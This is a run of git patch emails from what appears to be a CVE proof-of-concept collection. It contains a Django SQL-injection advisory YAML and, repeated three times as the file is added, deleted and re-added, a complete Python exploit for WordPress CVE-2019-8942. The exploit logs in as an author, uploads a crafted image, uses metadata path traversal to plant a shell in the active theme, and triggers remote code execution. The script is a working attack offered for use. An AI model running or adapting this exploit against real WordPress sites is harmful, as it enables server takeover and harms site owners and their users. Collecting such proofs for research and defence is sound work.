zJk9n~6I16&;otInXJJKJbpL!I_B1(yPg0WFLWQBQFFSUAcI^dPcQ38nin7R~ z`ircHx?dfFBkA6(kX`#r-J28&izITKzKrS08j>O%9d7qI1!U@`%~=|21*Qe&xEWO_ z?7b4^xK0?WqDSIk2W#9@d6wKMA!*dWjc35*n46v4|9 zwh)v|rUA({Nn^jqP}l=6pOd9JadM`jrRdi;ZkB6`&;z367RqFAUU!H9+$n z(buq+(02tHfmM`l%Kxa{jB1?5(bX@jhXMG{3OKy=`?4}w(@xLFPLO|Lls#M-#6GA2 zI>zt7z zk9sD`Bp$?<)aP5o6$V`V3+?->{wnL|XUU4UD*Q&2)C#&BaNaVrFQN%CHtEl}ATDYB zQX?vfeO2;F?fk_G$Yrjm8fZ=W`M8YkpVpnoRenlXwd|4GrJ9#P6~-Wy6Pjc@^0`kx z)=xjv_Q(RG_T?e1+o)}qZ`y6h2+z`N^rY#OVu@+Fqq>|}B zup=R38C^O#fvw~|x(ZW_=>Tw@w;bJ5b%^=!#qf9SAA9=I^*sIVZkA&nFAVRhX@mEa zFBSD%EyJLl5e>Fe)vW$70VCV2+5d^kY|gC%N#B>p`smxB#xSN3aqE$HkUH}8p`d?A_D zW0pe3P+jzQsJ00}{YjW-<=UtUNwEL5qn*<@jR>%--vWc%9Nc5?AuGx>>QQ|@#nHE3 z=yL&<4F=dq#g;jiRgf8^%81)aEv*%q1_f$&xidP`JoWia0(W;^Dzqt>Ui9g2_T2ai z%rWT^bZtH)(G#2s77qyn6{;&=ma#cr7IB`s^eeG1pa>dk?K)!iGdx%O-s^O_F7Mlv z^~7)E>p5M%`NOBf?Q&=i8Lc73{;bIcv!?NnFB1A5z@VM1lA@DKSH`cAPq*H}YV9_+ z>nV?Qlv=&TQ9zs_DD`JW@ru^H96^`D;Geu8-D=u?CrtCh&zxOKN%s;J6NXwZhpr|3 zPwSlo&yCoOtK-!{`^bku8_k2f8O8A~7@`JLcivfSt@@O%*0^GFJ%X37_uAw?dA6#;6=0 z!df>s! z@kR%3J4fCn6$PW?g*XDoPqS*V8Byw84m`+b5X($&kYjG#64)e zw}BnVs&R4FW#8;SPFU6>G)G*&5o1yG+Fw$Q3p-WxEtjc%Y6vtH*>`YVaK%)3<}OlX z{3Mi=FN?9ADt@@FJ$OJwP*zl5J=XCbeV|jPRq}*-%rR{7ru`Vm5-`jQZ z3hws$L(sYxpdGE*%!ufT?P)4dk+#v;!i|pS?B#UM2%@JEwF`yHwO2a#hP7XA3O<*uid=I@2y=8+lSH$3*HV zdMP29&w>ogo*3i;IuR%150j|5Q}^ZL8B!S1PQTrGz9OR%1UDZ#9zZCwBXxOq-#^a7Vav>uFtmE0U+;-pT3(ZyM0;jwNeHgUG z{pA3@n-}7q?`5^gi1&ev@9quie&4eeybN=5x?$txYG$X^c5$aWI5^bZ?`5Ra;WC!Mp0r+aam*~ZmdhwuX~=G(izO}`uSPCv;N}sYPutq<;&*o=FmE?sWREm<9#?6A$D+Ihi9xz#G$Pq(XOM`js_H~7lbGp z(DwJP`GlQQR6i+T8KqcjvG{F1H1A@W`E5PE5v4yGfH`F|nM9Mrl1csrZ3rKQ_<2#; z*O4^$Ed9XF{=Ku;MVHY5F72-{9c(psyb3us^xd{YW4bQpB&?&|RIh()3192%%s{+` zSdw8xhF2lU8!D|`Sxtmoe<%+&+h^*hG6FuV3)~TY$_nXer0uALHs8CM)Rt>-k$7y- z==gDp6@0yAH$6Qb zeaDr`URkr%9dlpz{0%-_oS0TfRdi6NJ9`Vtr5>rVvCur%@U+hFP`4ghgwlwA`q3Xn zmn`WnOq&|pX0hMLH^OByxi@6dk^JF{k-YWDvh3U@Eq@}HHr|r3@2;y0k9Wm7TUCXl zA8X&5N(s=DfKw;4?DegDW^`BYT^}8FX<2EEu&0YjAhM?}lN~}nirJ%=aU8&IN75+M zz%&2FYkGUp>nGJ@)Ry+wF1}vT$B8#+*{YMP-S~6GAo3M-v9R}5J zlb&>mpMj$D-8KjuK`uQym{_!}87p1%|n`n~r{ z?D(F6i-`4xu%2rscG#)SD!}1&gQinPg4I& z9hzndF2lc*H#%OAp%D5=td*AR5=37f7ihEnJkte*`{1UdCLKhP=lV7WYm_=XzMgC< z7e}<&c_SQ>|LQEE6=`q56XG%;tt$3BmX{148P6Ul8&6gSpGkcmBh@-0>FPCvCkRUjRH&(gI`5_!KhGWM%pOD@bqxh!9XsWJ$Tl~6#(2=6b7 zw_M%^i!pm}?3{t@30MAg%n~u`d{RCo3K8mNb6844v&JD{G#8d{qIh(!RP@22&u6eU zjD_CmYRl6iWLnhTAZoHq3PCwTN?Uro;R7F<56bgM2&_GJ+8Bn$kTcL$Kcv5^ko9z3 zCM5H-Z1J6c1CLp#FjPA~WP)td9hV_OZ@>>M-p?zMEoSUbzM zX(wizhs%>IM{4?*@eL}hU7S=qNc)fnx+s?OQb6b6b(b>hwFRdp@_S&6FF1ZTh@D(WJMZ z{QrN!Y8poK%#{1}%_5`m`3?HqFC&`iZ#fk5C>nG*MRow`asc5!a=IqhGx;|z^1l`QnCtNeFIv;@j=p>V5XHs(kTa35v*xUWeoRUW|=%I~g9!T)n##LBV@e+mifi z@tW7`QV5sS&NHE0E&|oBJXS((45Hzh3xTW#cmY8NL*zr)iHD+;YVv|)I`k5BjP0e1 zz^{{BEyPP7A?NKMoVrrfKH2@?+|#T;%|hEMlLDMJP$ZaBHTj7rxc^AN6eO+i+H6uj z3E7VNR8;|iqeh~A=Dt{UkcrG%DXGN+lkA0CF6QvHPjA(=P}N$;1ZdzU_QmZQ>WV$li$5EO z!Wr1A7<6gLe{6>DCE@6_gm+)L?{sy?QCjF0? z8-ci3L(q**9^!D)7UTKA5LjB=USWf_l{DD)&O%g59VCEN6WqDYn$>m#D9t6?(h2SI zSj(FVJcVA68jPQ77pfN(LjJMc@94B`*!2GzYT1+6b{S7Td@?=}6itrC2N-xUF8FTH z>m4*yaW@d-^lj=vY1yX4qfW8#iB*;`VHLphN#*_c=y&z3u*EPKSw>)CPgZz?m(5R~ z{|ak~x5@6`oU5eL_fdDNj$+v8f(4x^?|tmDY)?Kk8OcS=uigtgG@(_e*>7gt;i0nd z_2nE&7yX)}lrHeh)N>haMpDX(wT~4ZMhuL7|S_~ia5GNzfPq7L! z8*25MYQx?7xCMbx*shSOG1?EjJVK-9bka$_JV5?5qyF*!Y?{5dn#f(9mz{; zER!nb6y)etDJ<1pgoul(3^sr-tUX;yi$8(~tzX3Y@}hFKm@f{9TVubhWx?u%MMq}L zB%zEJgM#Pp>GJ&y#mn9C0t|K+^nV&N%h7w#a^3(JJ7-k=AF{&N9^bwKfR||kq{T87 z{~2ztRir`EQNhMvb96I5+UMxB^YDX3`%}PiH{mMvOQBgL&I?-Bevq$m8sr$#Vfy!m zfyHZjgYicbs@GkDje0oa8C?)UNt|*uq+c+sr(geQrpsk5xH}3l`ifPrUdg_eRh)@h z2@8X)eP#Xnxi{qulHy#*mLBP_9-U&AT)o7Tzo3-7)4D&bwJM&WYvF80$ zW&cj8Jl%PB>`Q-blub&4N*;oiwU-1rx9tRyY@!YA>s#3a7umN}166BHCq{0>G}jb$0SDx>}(dEnYPCzImWe$Vq2) zSsD+09+E{b9pE?O0^_sYnPk82Z%<&WDPc*BJ&ReQ?-*g>#05j$yE6sG(##X5qO3j) z*NqMwt@CYHhudRth*=YQ?)19gK!=LO>mtpC+hT}*Amx~ee%xEse)b*?hvy>9p<6Si zs7$aZ8nGGzz;-0F;LLk2RU#ZwDJ};&CNGyh*!a{`HJd3sf!sO;g;RBw8z4kQg@-Rs z4azCBl?C!PsLBvYzdBWJd);>bsFQ8Yq$&5ObCU1+?CTjmcv}?fsyubE7fjz{s45ZH zGUYWjyztEavNs`qPN^YfdETuc9cH^?6~{;2G=tigFZ&s<_;=>ge`wm|7ixuhUNlf_ z4U)J^V+%^Gas1Vyy4L&GLDo8>;(TYjc&=fY^PBvgQs|38 zjMpJyZW>or2OQ2<(a;}UP*kO__k7jS>6>x*>8`OC7Ln+yMVR+G03OfUtEZ-@=m^t$ zPV;+BRwkKwZ1<+m7Bj`@)7dAv^stnY>8yoepl$+ruURa1Z@~m6jX`W~J^oNU51=Zs zG0xp&4szXB+I;U*aucij@o&n-#0MyTO`0ZiOomto{2as2eo+uVF}v5jC45e4V%r-z zjDCu9&>Eq^9dl8jcWS5So1F64p`EbohG0GUzHL3BhdAC+Ak~n|&ClY4y~ufQbUwLW ztV2De<1oXpx*Ezi-yi~d9bmw}z)u1aSWH+xSCyDK_dNe!K?*fh_5UNJK+>~aRfloc z?;FeZT8MSL(LnZG93l?)3*$$0G`!y;awDDk5p)%M9yi~hW#({U9Ksm;ce-g+0iHXP zHCneI^ixo`+(YCOUajrFGvp)~pMHaJ!FUY-1o4KSXLLzKhK$E_#>uBbix0jN&sNg>O}JN( z&cnCNUy*up)t$})|Bnf1w(!yD%oyNG-+S-Cj`5qQsxoiWrIpPK9?q5}LC7pgHb1FQ z%S6l~+F9V~;%p#cH68j0ds!qHY#b|b8zubB)|v)ue_hiZOtKfhS<0wCRzaVSvmVI% zEU9TZs{zdayw@Lb$24Dbr~z6-Sf6goczQAKUx(2MpU$qHYGNMDR$|Do{O+Bj9kk%4ne)p8|j^BCqR5DxlVXI<^ATz&(L1?jfWPGeIMs1`?Zlw_JAKYx_ zA$1F=Lti~OGn+eY)-|e?;}VEgB;g-sS_sVp$hf&=Ou9@9TgJV=j>ZFP_VMY(*0h3cJBrhq!CZCMGkOt-tOo^cIoh%G7lt%#>o2OMUHLy`iLm(V8-()n8yT5xsi4iih7qi$*=hMG`Ta2y*#c}QS7dtlTZ%Pm(mCVLH zw&Yp}x00K2(2rrUArK52=SmN&czJ~cMh(yZp3*w621JBZfkO@_7sWRo4%pyxqooI2 zSeI6Y=Yyyxh_Q*0t=^7GE6Xu0E`2QJg2}y+Xfu!x6{ff<%6Y?^9pajE%EA4;iDASx{RN(nn)&f8-cYzkSr@J~BWLRMWl%sqlNxBcL{0N*iwe17=6mDe}#nP@!hi zW>=xCbG6rI#vtd#dG9>*s2PjHV$-S#$xD{AZ>p%8fuA4dr#78oCM4qELv0X;bH0c4 zlGox5o!FGO6BrWfx9QXJqvvRV|K1z|rV}&Uyz=34#Z8SD!5PiK)}wxcWs+0=J!`59 zCz{#ZbL2kV;Yy9_zZJgs7_z;&Pk*aH1s^y0~dK(F_}e>m>;B(BcXoioMI z!W|5>^(Z!}ZaXPgdQ&Qpt%H%8x_m3^vA%c4`C@IlP?zH+BL3$RADmzT-WT@&bspb! zX}19WcN*{Bk8g|3@ay*jH=Mv8(ufk-`W=#ZydJw~O3uzoAc&OpzWQr(j`lGU*6hTF zQ=R@%>X@rO2Cb90Q3Di9l;ovoiM|)^m_1Hdj+qQ|fWZl*g#liNl%aWBxMewjZlkOs)a^44g!+q*a>)*&Jwt z4oy;vhCUeSC;Vp^J29&KgwOx}kqPpHcccC@hAC{Kii?BIQmdWQy)L)^v-Hg$O%rQc zqs}1zAfs#}0tR)~CitQF?`#OLtu#&fneI{fOu51Bfdl$u%=qu*KKQ=ItA9Ds;P0ZL z?f=FA3Qhi}3$$l$1Vl4*Pq+?lVS!3$8;wsTkZ+fZYaXWkq_W)p_FjM`$^Tb_KnKmg n@B4opsPKOo2J-*Kb}vB=B%0Ip>taSY*w1@e6`3+=!>|7hzzG7; literal 0 HcmV?d00001 diff --git a/cve/django/2022/yaml/CVE-2022-28346.yaml b/cve/django/2022/yaml/CVE-2022-28346.yaml new file mode 100644 index 00000000..739255ff --- /dev/null +++ b/cve/django/2022/yaml/CVE-2022-28346.yaml @@ -0,0 +1,22 @@ +id: CVE-2022-28346 +source: + https://github.com/DeEpinGh0st/CVE-2022-28346 +info: + name: Django 是一个高级的 Python 网络框架,可以快速开发安全和可维护的网站。由经验丰富的开发者构建,Django 负责处理网站开发中麻烦的部分,因此你可以专注于编写应用程序,而无需重新开发。 它是免费和开源的,有活跃繁荣的社区,丰富的文档,以及很多免费和付费的解决方案。 + severity: critical + description: | + Django部分版本存在QuerySet.annotate()、aggregate() 和 extra() 方法可通过精心制作的字典(带有字典扩展)作为传递的 **kwargs 在列别名中进行 SQL 注入。 + scope-of-influence: + Django 2.2.x - 2.2.28 + Django 3.2.x - 3.2.13 + Django 4.0.x - 4.0.4 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-28346 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-28346 + cwe-id: CWE-89 + cnvd-id: None + kve-id: None + tags: Django, SQL injection \ No newline at end of file From d65b1558dc58e25881f5fa06b477e2d0daad353e Mon Sep 17 00:00:00 2001 From: zeroc Date: Fri, 7 Apr 2023 17:22:05 +0800 Subject: [PATCH 013/109] =?UTF-8?q?=E6=9B=B4=E6=96=B0openkylin=5Flist.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- openkylin_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 7128c8a6..ce103e6a 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -145,6 +145,8 @@ cve: - CVE-2021-3517 - CVE-2021-3518 - CVE-2021-3537 + django: + - CVE-2022-28346 fortinac: - CVE-2022-39952 redis: From 3053435b624d3409d33ca19d5b865f3410b51060 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:22:42 +0000 Subject: [PATCH 014/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20WordPress?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/WordPress/.keep diff --git a/cve/WordPress/.keep b/cve/WordPress/.keep new file mode 100644 index 00000000..e69de29b From cb3db2a94b57e7e65834abfbe76a97711fa09d5b Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:25:00 +0000 Subject: [PATCH 015/109] add cve/WordPress/poc.py. Signed-off-by: bbj --- cve/WordPress/poc.py | 97 ++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 97 insertions(+) create mode 100644 cve/WordPress/poc.py diff --git a/cve/WordPress/poc.py b/cve/WordPress/poc.py new file mode 100644 index 00000000..853e4d08 --- /dev/null +++ b/cve/WordPress/poc.py @@ -0,0 +1,97 @@ +#!/usr/bin/python3 + +###################### +## Imagick RCE POC ## +###################### +import requests +import re + +url_root = 'http://localhost/' +theme = 'twentyseventeen' +current_date = '2019/03/' +filename = "imagick.jpg" + +session = requests.Session() +creds={'log':'author','pwd':'author','wp-submit':'Log In','redirect_to':'{url}wp-admin/'.format(url=url_root),'testcookie':1} +tmp={'wordpress_test_cookie':'WP Cookie check'} +r=session.post(url_root+'wp-login.php',cookies=tmp,data=creds) +wp_init_cookies=session.cookies + +#get nonce +response = requests.get('{url}wp-admin/media-new.php'.format(url=url_root),cookies=wp_init_cookies) +_wp_nonce = re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] + + +#uploading image +data = { + 'post_id': '0', + '_wp_http_referer': '/wp-admin/media-new.php', + '_wpnonce': _wp_nonce, + 'action': 'upload_attachement', + 'html-upload': 'Upload' +} +evil = {'async-upload':(filename, open(filename, 'rb'))} +upload_result = session.post(url_root+'wp-admin/async-upload.php', data=data, files=evil, cookies=wp_init_cookies) +image_id=upload_result.text +print(f'Image ID: {image_id}') + +#First exploit :changing metadata +#Part 1 create folder ==> evil.jpg?/x +response=requests.get(url_root+'wp-admin/post.php?post='+image_id+'&action=edit',cookies=wp_init_cookies) +_wpnonce=re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] +ajax_nonce = re.findall(r'imageEdit\.open\( \w+, "(\w+)"',response.text)[0] +print(ajax_nonce) +data={'_wpnonce':_wpnonce, +'action':'editpost', +'post_ID':image_id, +'meta_input[_wp_attached_file]':current_date+filename+'?/x' +} +response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) + +#Creating file with wrop-image +data={'action':'crop-image', +'_ajax_nonce':ajax_nonce, +'id':image_id, +'cropDetails[x1]':0, +'cropDetails[y1]':0, +'cropDetails[width]':400, +'cropDetails[height]':300, +'cropDetails[dst_width]':10, +'cropDetails[dst_height]':10} +response=requests.post(url_root+'wp-admin/admin-ajax.php',data=data, cookies=wp_init_cookies) + +#Part 2 creating file into current theme +data={'_wpnonce':_wpnonce, +'action':'editpost', +'post_ID':image_id, +'meta_input[_wp_attached_file]':current_date+filename+'?/../../../../themes/'+theme+'/shell' +} +response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) +data={'action':'crop-image', +'_ajax_nonce':ajax_nonce, +'id':image_id, +'cropDetails[x1]':0, +'cropDetails[y1]':0, +'cropDetails[width]':400, +'cropDetails[height]':300, +'cropDetails[dst_width]':10, +'cropDetails[dst_height]':10} +response=requests.post(url_root+'wp-admin/admin-ajax.php',data=data, cookies=wp_init_cookies) +print(response.text) + +#Including into theme +response=requests.post(url_root+'wp-admin/post-new.php', cookies=wp_init_cookies) +_wpnonce=re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] +post_id=re.findall(r'"post":{"id":(\w+),',response.text)[0] +print(f'Post ID: {post_id}') + +data={'_wpnonce':_wpnonce, +'action':'editpost', +'post_ID':post_id, +'post_title':'wut', +'post_name':'wut', +'meta_input[_wp_page_template]':'cropped-shell.jpg' +} +response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) + +print(f'Rce at {url_root}?p={post_id}') \ No newline at end of file From 3fbd25e944e26ac18e14b3e154802a7aa27c3cb7 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:25:10 +0000 Subject: [PATCH 016/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/WordPress/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/WordPress/.keep diff --git a/cve/WordPress/.keep b/cve/WordPress/.keep deleted file mode 100644 index e69de29b..00000000 From 24f8fb5990bdba4afd59515f252d32a48a13c78d Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:26:09 +0000 Subject: [PATCH 017/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2019-8942?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/CVE-2019-8942/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/WordPress/CVE-2019-8942/.keep diff --git a/cve/WordPress/CVE-2019-8942/.keep b/cve/WordPress/CVE-2019-8942/.keep new file mode 100644 index 00000000..e69de29b From 23539481916e494048d233ad222f0be1f68060e1 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:26:28 +0000 Subject: [PATCH 018/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202019?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/WordPress/2019/.keep diff --git a/cve/WordPress/2019/.keep b/cve/WordPress/2019/.keep new file mode 100644 index 00000000..e69de29b From 8a417244cf61f49eb26a8c6c0cbfef68cc7ccf0e Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:26:37 +0000 Subject: [PATCH 019/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/WordPress/poc.py?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/poc.py | 97 -------------------------------------------- 1 file changed, 97 deletions(-) delete mode 100644 cve/WordPress/poc.py diff --git a/cve/WordPress/poc.py b/cve/WordPress/poc.py deleted file mode 100644 index 853e4d08..00000000 --- a/cve/WordPress/poc.py +++ /dev/null @@ -1,97 +0,0 @@ -#!/usr/bin/python3 - -###################### -## Imagick RCE POC ## -###################### -import requests -import re - -url_root = 'http://localhost/' -theme = 'twentyseventeen' -current_date = '2019/03/' -filename = "imagick.jpg" - -session = requests.Session() -creds={'log':'author','pwd':'author','wp-submit':'Log In','redirect_to':'{url}wp-admin/'.format(url=url_root),'testcookie':1} -tmp={'wordpress_test_cookie':'WP Cookie check'} -r=session.post(url_root+'wp-login.php',cookies=tmp,data=creds) -wp_init_cookies=session.cookies - -#get nonce -response = requests.get('{url}wp-admin/media-new.php'.format(url=url_root),cookies=wp_init_cookies) -_wp_nonce = re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] - - -#uploading image -data = { - 'post_id': '0', - '_wp_http_referer': '/wp-admin/media-new.php', - '_wpnonce': _wp_nonce, - 'action': 'upload_attachement', - 'html-upload': 'Upload' -} -evil = {'async-upload':(filename, open(filename, 'rb'))} -upload_result = session.post(url_root+'wp-admin/async-upload.php', data=data, files=evil, cookies=wp_init_cookies) -image_id=upload_result.text -print(f'Image ID: {image_id}') - -#First exploit :changing metadata -#Part 1 create folder ==> evil.jpg?/x -response=requests.get(url_root+'wp-admin/post.php?post='+image_id+'&action=edit',cookies=wp_init_cookies) -_wpnonce=re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] -ajax_nonce = re.findall(r'imageEdit\.open\( \w+, "(\w+)"',response.text)[0] -print(ajax_nonce) -data={'_wpnonce':_wpnonce, -'action':'editpost', -'post_ID':image_id, -'meta_input[_wp_attached_file]':current_date+filename+'?/x' -} -response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) - -#Creating file with wrop-image -data={'action':'crop-image', -'_ajax_nonce':ajax_nonce, -'id':image_id, -'cropDetails[x1]':0, -'cropDetails[y1]':0, -'cropDetails[width]':400, -'cropDetails[height]':300, -'cropDetails[dst_width]':10, -'cropDetails[dst_height]':10} -response=requests.post(url_root+'wp-admin/admin-ajax.php',data=data, cookies=wp_init_cookies) - -#Part 2 creating file into current theme -data={'_wpnonce':_wpnonce, -'action':'editpost', -'post_ID':image_id, -'meta_input[_wp_attached_file]':current_date+filename+'?/../../../../themes/'+theme+'/shell' -} -response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) -data={'action':'crop-image', -'_ajax_nonce':ajax_nonce, -'id':image_id, -'cropDetails[x1]':0, -'cropDetails[y1]':0, -'cropDetails[width]':400, -'cropDetails[height]':300, -'cropDetails[dst_width]':10, -'cropDetails[dst_height]':10} -response=requests.post(url_root+'wp-admin/admin-ajax.php',data=data, cookies=wp_init_cookies) -print(response.text) - -#Including into theme -response=requests.post(url_root+'wp-admin/post-new.php', cookies=wp_init_cookies) -_wpnonce=re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] -post_id=re.findall(r'"post":{"id":(\w+),',response.text)[0] -print(f'Post ID: {post_id}') - -data={'_wpnonce':_wpnonce, -'action':'editpost', -'post_ID':post_id, -'post_title':'wut', -'post_name':'wut', -'meta_input[_wp_page_template]':'cropped-shell.jpg' -} -response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) - -print(f'Rce at {url_root}?p={post_id}') \ No newline at end of file From 5ed955d265cef92cdccbe32bee1f6bb28c7e411d Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:26:42 +0000 Subject: [PATCH 020/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/WordPress/CVE-2019-8942?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/CVE-2019-8942/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/WordPress/CVE-2019-8942/.keep diff --git a/cve/WordPress/CVE-2019-8942/.keep b/cve/WordPress/CVE-2019-8942/.keep deleted file mode 100644 index e69de29b..00000000 From ae68072e3f15ff9597712d594ec4a245a3ea6a20 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:27:04 +0000 Subject: [PATCH 021/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2019-8942?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/2019/CVE-2019-8942/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/WordPress/2019/CVE-2019-8942/.keep diff --git a/cve/WordPress/2019/CVE-2019-8942/.keep b/cve/WordPress/2019/CVE-2019-8942/.keep new file mode 100644 index 00000000..e69de29b From 3bea185e6d42faa22c5f0b1ea50b201c650d5d2a Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:27:22 +0000 Subject: [PATCH 022/109] add cve/WordPress/2019/CVE-2019-8942/poc.py. Signed-off-by: bbj --- cve/WordPress/2019/CVE-2019-8942/poc.py | 97 +++++++++++++++++++++++++ 1 file changed, 97 insertions(+) create mode 100644 cve/WordPress/2019/CVE-2019-8942/poc.py diff --git a/cve/WordPress/2019/CVE-2019-8942/poc.py b/cve/WordPress/2019/CVE-2019-8942/poc.py new file mode 100644 index 00000000..853e4d08 --- /dev/null +++ b/cve/WordPress/2019/CVE-2019-8942/poc.py @@ -0,0 +1,97 @@ +#!/usr/bin/python3 + +###################### +## Imagick RCE POC ## +###################### +import requests +import re + +url_root = 'http://localhost/' +theme = 'twentyseventeen' +current_date = '2019/03/' +filename = "imagick.jpg" + +session = requests.Session() +creds={'log':'author','pwd':'author','wp-submit':'Log In','redirect_to':'{url}wp-admin/'.format(url=url_root),'testcookie':1} +tmp={'wordpress_test_cookie':'WP Cookie check'} +r=session.post(url_root+'wp-login.php',cookies=tmp,data=creds) +wp_init_cookies=session.cookies + +#get nonce +response = requests.get('{url}wp-admin/media-new.php'.format(url=url_root),cookies=wp_init_cookies) +_wp_nonce = re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] + + +#uploading image +data = { + 'post_id': '0', + '_wp_http_referer': '/wp-admin/media-new.php', + '_wpnonce': _wp_nonce, + 'action': 'upload_attachement', + 'html-upload': 'Upload' +} +evil = {'async-upload':(filename, open(filename, 'rb'))} +upload_result = session.post(url_root+'wp-admin/async-upload.php', data=data, files=evil, cookies=wp_init_cookies) +image_id=upload_result.text +print(f'Image ID: {image_id}') + +#First exploit :changing metadata +#Part 1 create folder ==> evil.jpg?/x +response=requests.get(url_root+'wp-admin/post.php?post='+image_id+'&action=edit',cookies=wp_init_cookies) +_wpnonce=re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] +ajax_nonce = re.findall(r'imageEdit\.open\( \w+, "(\w+)"',response.text)[0] +print(ajax_nonce) +data={'_wpnonce':_wpnonce, +'action':'editpost', +'post_ID':image_id, +'meta_input[_wp_attached_file]':current_date+filename+'?/x' +} +response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) + +#Creating file with wrop-image +data={'action':'crop-image', +'_ajax_nonce':ajax_nonce, +'id':image_id, +'cropDetails[x1]':0, +'cropDetails[y1]':0, +'cropDetails[width]':400, +'cropDetails[height]':300, +'cropDetails[dst_width]':10, +'cropDetails[dst_height]':10} +response=requests.post(url_root+'wp-admin/admin-ajax.php',data=data, cookies=wp_init_cookies) + +#Part 2 creating file into current theme +data={'_wpnonce':_wpnonce, +'action':'editpost', +'post_ID':image_id, +'meta_input[_wp_attached_file]':current_date+filename+'?/../../../../themes/'+theme+'/shell' +} +response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) +data={'action':'crop-image', +'_ajax_nonce':ajax_nonce, +'id':image_id, +'cropDetails[x1]':0, +'cropDetails[y1]':0, +'cropDetails[width]':400, +'cropDetails[height]':300, +'cropDetails[dst_width]':10, +'cropDetails[dst_height]':10} +response=requests.post(url_root+'wp-admin/admin-ajax.php',data=data, cookies=wp_init_cookies) +print(response.text) + +#Including into theme +response=requests.post(url_root+'wp-admin/post-new.php', cookies=wp_init_cookies) +_wpnonce=re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] +post_id=re.findall(r'"post":{"id":(\w+),',response.text)[0] +print(f'Post ID: {post_id}') + +data={'_wpnonce':_wpnonce, +'action':'editpost', +'post_ID':post_id, +'post_title':'wut', +'post_name':'wut', +'meta_input[_wp_page_template]':'cropped-shell.jpg' +} +response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) + +print(f'Rce at {url_root}?p={post_id}') \ No newline at end of file From 1904aa68605b233d07618c51779c38a24c0c6b30 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:28:35 +0000 Subject: [PATCH 023/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/WordPress/2019/CVE-2019-8942/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/2019/CVE-2019-8942/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/WordPress/2019/CVE-2019-8942/.keep diff --git a/cve/WordPress/2019/CVE-2019-8942/.keep b/cve/WordPress/2019/CVE-2019-8942/.keep deleted file mode 100644 index e69de29b..00000000 From 4c59f4952d1f867f08b0dd1e8eb9b618ec0b3341 Mon Sep 17 00:00:00 2001 From: bbj 